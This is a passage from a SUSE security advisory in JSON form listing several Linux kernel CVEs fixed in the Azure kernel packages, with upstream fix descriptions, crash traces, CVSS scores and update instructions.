"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68297"
},
{
"cve": "CVE-2025-68301",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68301"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: atlantic: fix fragment overflow handling in RX path\n\nThe atlantic driver can receive packets with more than MAX_SKB_FRAGS (17)\nfragments when handling large multi-descriptor packets. This causes an\nout-of-bounds write in skb_add_rx_frag_netmem() leading to kernel panic.\n\nThe issue occurs because the driver doesn\u0027t check the total number of\nfragments before calling skb_add_rx_frag(). When a packet requires more\nthan MAX_SKB_FRAGS fragments, the fragment index exceeds the array bounds.\n\nFix by assuming there will be an extra frag if buff-\u003elen \u003e AQ_CFG_RX_HDR_SIZE,\nthen all fragments are accounted for. And reusing the existing check to\nprevent the overflow earlier in the code path.\n\nThis crash occurred in production with an Aquantia AQC113 10G NIC.\n\nStack trace from production environment:\n```\nRIP: 0010:skb_add_rx_frag_netmem+0x29/0xd0\nCode: 90 f3 0f 1e fa 0f 1f 44 00 00 48 89 f8 41 89\nca 48 89 d7 48 63 ce 8b 90 c0 00 00 00 48 c1 e1 04 48 01 ca 48 03 90\nc8 00 00 00 \u003c48\u003e 89 7a 30 44 89 52 3c 44 89 42 38 40 f6 c7 01 75 74 48\n89 fa 83\nRSP: 0018:ffffa9bec02a8d50 EFLAGS: 00010287\nRAX: ffff925b22e80a00 RBX: ffff925ad38d2700 RCX:\nfffffffe0a0c8000\nRDX: ffff9258ea95bac0 RSI: ffff925ae0a0c800 RDI:\n0000000000037a40\nRBP: 0000000000000024 R08: 0000000000000000 R09:\n0000000000000021\nR10: 0000000000000848 R11: 0000000000000000 R12:\nffffa9bec02a8e24\nR13: ffff925ad8615570 R14: 0000000000000000 R15:\nffff925b22e80a00\nFS: 0000000000000000(0000)\nGS:ffff925e47880000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: ffff9258ea95baf0 CR3: 0000000166022004 CR4:\n0000000000f72ef0\nPKRU: 55555554\nCall Trace:\n\u003cIRQ\u003e\naq_ring_rx_clean+0x175/0xe60 [atlantic]\n? aq_ring_rx_clean+0x14d/0xe60 [atlantic]\n? aq_ring_tx_clean+0xdf/0x190 [atlantic]\n? kmem_cache_free+0x348/0x450\n? aq_vec_poll+0x81/0x1d0 [atlantic]\n? __napi_poll+0x28/0x1c0\n? net_rx_action+0x337/0x420\n```\n\nChanges in v4:\n- Add Fixes: tag to satisfy patch validation requirements.\n\nChanges in v3:\n- Fix by assuming there will be an extra frag if buff-\u003elen \u003e AQ_CFG_RX_HDR_SIZE,\n then all fragments are accounted for.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68301",
"url": "https://www.suse.com/security/cve/CVE-2025-68301"
},
{
"category": "external",
"summary": "SUSE Bug 1255120 for CVE-2025-68301",
"url": "https://bugzilla.suse.com/1255120"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68301"
},
{
"cve": "CVE-2025-68320",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68320"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlan966x: Fix sleeping in atomic context\n\nThe following warning was seen when we try to connect using ssh to the device.\n\nBUG: sleeping function called from invalid context at kernel/locking/mutex.c:575\nin_atomic(): 1, irqs_disabled(): 0, non_block: 0, pid: 104, name: dropbear\npreempt_count: 1, expected: 0\nINFO: lockdep is turned off.\nCPU: 0 UID: 0 PID: 104 Comm: dropbear Tainted: G W 6.18.0-rc2-00399-g6f1ab1b109b9-dirty #530 NONE\nTainted: [W]=WARN\nHardware name: Generic DT based system\nCall trace:\n unwind_backtrace from show_stack+0x10/0x14\n show_stack from dump_stack_lvl+0x7c/0xac\n dump_stack_lvl from __might_resched+0x16c/0x2b0\n __might_resched from __mutex_lock+0x64/0xd34\n __mutex_lock from mutex_lock_nested+0x1c/0x24\n mutex_lock_nested from lan966x_stats_get+0x5c/0x558\n lan966x_stats_get from dev_get_stats+0x40/0x43c\n dev_get_stats from dev_seq_printf_stats+0x3c/0x184\n dev_seq_printf_stats from dev_seq_show+0x10/0x30\n dev_seq_show from seq_read_iter+0x350/0x4ec\n seq_read_iter from seq_read+0xfc/0x194\n seq_read from proc_reg_read+0xac/0x100\n proc_reg_read from vfs_read+0xb0/0x2b0\n vfs_read from ksys_read+0x6c/0xec\n ksys_read from ret_fast_syscall+0x0/0x1c\nException stack(0xf0b11fa8 to 0xf0b11ff0)\n1fa0: 00000001 00001000 00000008 be9048d8 00001000 00000001\n1fc0: 00000001 00001000 00000008 00000003 be905920 0000001e 00000000 00000001\n1fe0: 0005404c be9048c0 00018684 b6ec2cd8\n\nIt seems that we are using a mutex in a atomic context which is wrong.\nChange the mutex with a spinlock.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68320",
"url": "https://www.suse.com/security/cve/CVE-2025-68320"
},
{
"category": "external",
"summary": "SUSE Bug 1255172 for CVE-2025-68320",
"url": "https://bugzilla.suse.com/1255172"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68320"
},
{
"cve": "CVE-2025-68325",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68325"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_cake: Fix incorrect qlen reduction in cake_drop\n\nIn cake_drop(), qdisc_tree_reduce_backlog() is used to update the qlen\nand backlog of the qdisc hierarchy. Its caller, cake_enqueue(), assumes\nthat the parent qdisc will enqueue the current packet. However, this\nassumption breaks when cake_enqueue() returns NET_XMIT_CN: the parent\nqdisc stops enqueuing current packet, leaving the tree qlen/backlog\naccounting inconsistent. This mismatch can lead to a NULL dereference\n(e.g., when the parent Qdisc is qfq_qdisc).\n\nThis patch computes the qlen/backlog delta in a more robust way by\nobserving the difference before and after the series of cake_drop()\ncalls, and then compensates the qdisc tree accounting if cake_enqueue()\nreturns NET_XMIT_CN.\n\nTo ensure correct compensation when ACK thinning is enabled, a new\nvariable is introduced to keep qlen unchanged.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68325",
"url": "https://www.suse.com/security/cve/CVE-2025-68325"
},
{
"category": "external",
"summary": "SUSE Bug 1255417 for CVE-2025-68325",
"url": "https://bugzilla.suse.com/1255417"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68325"
},
{
"cve": "CVE-2025-68327",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68327"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: renesas_usbhs: Fix synchronous external abort on unbind\n\nA synchronous external abort occurs on the Renesas RZ/G3S SoC if unbind is\nexecuted after the configuration sequence described above:\n\nmodprobe usb_f_ecm\nmodprobe libcomposite\nmodprobe configfs\ncd /sys/kernel/config/usb_gadget\nmkdir -p g1\ncd g1\necho \"0x1d6b\" \u003e idVendor\necho \"0x0104\" \u003e idProduct\nmkdir -p strings/0x409\necho \"0123456789\" \u003e strings/0x409/serialnumber\necho \"Renesas.\" \u003e strings/0x409/manufacturer\necho \"Ethernet Gadget\" \u003e strings/0x409/product\nmkdir -p functions/ecm.usb0\nmkdir -p configs/c.1\nmkdir -p configs/c.1/strings/0x409\necho \"ECM\" \u003e configs/c.1/strings/0x409/configuration\n\nif [ ! -L configs/c.1/ecm.usb0 ]; then\n ln -s functions/ecm.usb0 configs/c.1\nfi\n\necho 11e20000.usb \u003e UDC\necho 11e20000.usb \u003e /sys/bus/platform/drivers/renesas_usbhs/unbind\n\nThe displayed trace is as follows:\n\n Internal error: synchronous external abort: 0000000096000010 [#1] SMP\n CPU: 0 UID: 0 PID: 188 Comm: sh Tainted: G M 6.17.0-rc7-next-20250922-00010-g41050493b2bd #55 PREEMPT\n Tainted: [M]=MACHINE_CHECK\n Hardware name: Renesas SMARC EVK version 2 based on r9a08g045s33 (DT)\n pstate: 604000c5 (nZCv daIF +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n pc : usbhs_sys_function_pullup+0x10/0x40 [renesas_usbhs]\n lr : usbhsg_update_pullup+0x3c/0x68 [renesas_usbhs]\n sp : ffff8000838b3920\n x29: ffff8000838b3920 x28: ffff00000d585780 x27: 0000000000000000\n x26: 0000000000000000 x25: 0000000000000000 x24: ffff00000c3e3810\n x23: ffff00000d5e5c80 x22: ffff00000d5e5d40 x21: 0000000000000000\n x20: 0000000000000000 x19: ffff00000d5e5c80 x18: 0000000000000020\n x17: 2e30303230316531 x16: 312d7968703a7968 x15: 3d454d414e5f4344\n x14: 000000000000002c x13: 0000000000000000 x12: 0000000000000000\n x11: ffff00000f358f38 x10: ffff00000f358db0 x9 : ffff00000b41f418\n x8 : 0101010101010101 x7 : 7f7f7f7f7f7f7f7f x6 : fefefeff6364626d\n x5 : 8080808000000000 x4 : 000000004b5ccb9d x3 : 0000000000000000\n x2 : 0000000000000000 x1 : ffff800083790000 x0 : ffff00000d5e5c80\n Call trace:\n usbhs_sys_function_pullup+0x10/0x40 [renesas_usbhs] (P)\n usbhsg_pullup+0x4c/0x7c [renesas_usbhs]\n usb_gadget_disconnect_locked+0x48/0xd4\n gadget_unbind_driver+0x44/0x114\n device_remove+0x4c/0x80\n device_release_driver_internal+0x1c8/0x224\n device_release_driver+0x18/0x24\n bus_remove_device+0xcc/0x10c\n device_del+0x14c/0x404\n usb_del_gadget+0x88/0xc0\n usb_del_gadget_udc+0x18/0x30\n usbhs_mod_gadget_remove+0x24/0x44 [renesas_usbhs]\n usbhs_mod_remove+0x20/0x30 [renesas_usbhs]\n usbhs_remove+0x98/0xdc [renesas_usbhs]\n platform_remove+0x20/0x30\n device_remove+0x4c/0x80\n device_release_driver_internal+0x1c8/0x224\n device_driver_detach+0x18/0x24\n unbind_store+0xb4/0xb8\n drv_attr_store+0x24/0x38\n sysfs_kf_write+0x7c/0x94\n kernfs_fop_write_iter+0x128/0x1b8\n vfs_write+0x2ac/0x350\n ksys_write+0x68/0xfc\n __arm64_sys_write+0x1c/0x28\n invoke_syscall+0x48/0x110\n el0_svc_common.constprop.0+0xc0/0xe0\n do_el0_svc+0x1c/0x28\n el0_svc+0x34/0xf0\n el0t_64_sync_handler+0xa0/0xe4\n el0t_64_sync+0x198/0x19c\n Code: 7100003f 1a9f07e1 531c6c22 f9400001 (79400021)\n ---[ end trace 0000000000000000 ]---\n note: sh[188] exited with irqs disabled\n note: sh[188] exited with preempt_count 1\n\nThe issue occurs because usbhs_sys_function_pullup(), which accesses the IP\nregisters, is executed after the USBHS clocks have been disabled. The\nproblem is reproducible on the Renesas RZ/G3S SoC starting with the\naddition of module stop in the clock enable/disable APIs. With module stop\nfunctionality enabled, a bus error is expected if a master accesses a\nmodule whose clock has been stopped and module stop activated.\n\nDisable the IP clocks at the end of remove.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68327",
"url": "https://www.suse.com/security/cve/CVE-2025-68327"
},
{
"category": "external",
"summary": "SUSE Bug 1255488 for CVE-2025-68327",
"url": "https://bugzilla.suse.com/1255488"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68327"
},
{
"cve": "CVE-2025-68337",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68337"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\njbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted\n\nThere\u0027s issue when file system corrupted:\n------------[ cut here ]------------\nkernel BUG at fs/jbd2/transaction.c:1289!\nOops: invalid opcode: 0000 [#1] SMP KASAN PTI\nCPU: 5 UID: 0 PID: 2031 Comm: mkdir Not tainted 6.18.0-rc1-next\nRIP: 0010:jbd2_journal_get_create_access+0x3b6/0x4d0\nRSP: 0018:ffff888117aafa30 EFLAGS: 00010202\nRAX: 0000000000000000 RBX: ffff88811a86b000 RCX: ffffffff89a63534\nRDX: 1ffff110200ec602 RSI: 0000000000000004 RDI: ffff888100763010\nRBP: ffff888100763000 R08: 0000000000000001 R09: ffff888100763028\nR10: 0000000000000003 R11: 0000000000000000 R12: 0000000000000000\nR13: ffff88812c432000 R14: ffff88812c608000 R15: ffff888120bfc000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f91d6970c99 CR3: 00000001159c4000 CR4: 00000000000006f0\nCall Trace:\n \u003cTASK\u003e\n __ext4_journal_get_create_access+0x42/0x170\n ext4_getblk+0x319/0x6f0\n ext4_bread+0x11/0x100\n ext4_append+0x1e6/0x4a0\n ext4_init_new_dir+0x145/0x1d0\n ext4_mkdir+0x326/0x920\n vfs_mkdir+0x45c/0x740\n do_mkdirat+0x234/0x2f0\n __x64_sys_mkdir+0xd6/0x120\n do_syscall_64+0x5f/0xfa0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nThe above issue occurs with us in errors=continue mode when accompanied by\nstorage failures. There have been many inconsistencies in the file system\ndata.\nIn the case of file system data inconsistency, for example, if the block\nbitmap of a referenced block is not set, it can lead to the situation where\na block being committed is allocated and used again. As a result, the\nfollowing condition will not be satisfied then trigger BUG_ON. Of course,\nit is entirely possible to construct a problematic image that can trigger\nthis BUG_ON through specific operations. In fact, I have constructed such\nan image and easily reproduced this issue.\nTherefore, J_ASSERT() holds true only under ideal conditions, but it may\nnot necessarily be satisfied in exceptional scenarios. Using J_ASSERT()\ndirectly in abnormal situations would cause the system to crash, which is\nclearly not what we want. So here we directly trigger a JBD abort instead\nof immediately invoking BUG_ON.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68337",
"url": "https://www.suse.com/security/cve/CVE-2025-68337"
},
{
"category": "external",
